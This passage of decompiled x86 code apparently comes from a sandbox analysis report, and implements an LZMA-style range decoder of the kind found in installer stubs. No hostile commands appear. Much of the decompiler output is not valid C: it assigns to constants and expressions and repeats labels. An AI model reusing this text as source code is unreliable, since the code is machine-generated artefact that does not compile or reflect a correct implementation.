						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
